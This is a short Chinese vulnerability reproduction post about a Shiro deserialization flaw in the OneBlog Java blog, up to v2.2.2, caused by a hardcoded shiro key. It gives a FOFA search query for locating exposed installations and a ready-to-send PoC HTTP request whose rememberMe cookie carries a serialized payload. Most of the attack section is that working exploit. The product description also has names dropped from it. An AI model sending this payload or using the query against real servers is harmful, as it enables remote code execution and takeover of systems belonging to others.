OneBlog Shiro 反序列化漏洞复现

0x01 产品简介
是一个简洁美观、功能强大并且自适应的Java博客 。使用开发,前端使用 。支持移动端自适应,配有完备的前台和后台管理功能 。
0x02 漏洞概述
v2.2.2及之前的版本存在 shiro 反序列化漏洞 , 该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据 , 在服务器上执行任意代码,执行系统命令、或打入内存马等 , 获取服务器权限 。
0x03 复现环境
FOFA:body="//js/zhyd.tool.js" || body=",开源博客"
0x04 漏洞复现
PoC
【OneBlog Shiro 反序列化漏洞复现】GET /passport/login/ HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Cookie: rememberMe=MERiOWRmRTYzRTVhRTdkNAV5Arkl/IQSpndZljnVXl9lknV7+t4WiqqsrNoVml0c4nVuXr4GJTo403JSNqQ3f31gLEVHN0SlS3YbumG/HDaiB2pefF3BTxg8J8L1EV/wKBKvmuZJKPtSkoYB7v4ly/X39hhS8EVUm+DIsg6tdnnMI/Y5WRvpZ4hnDtaMabMT3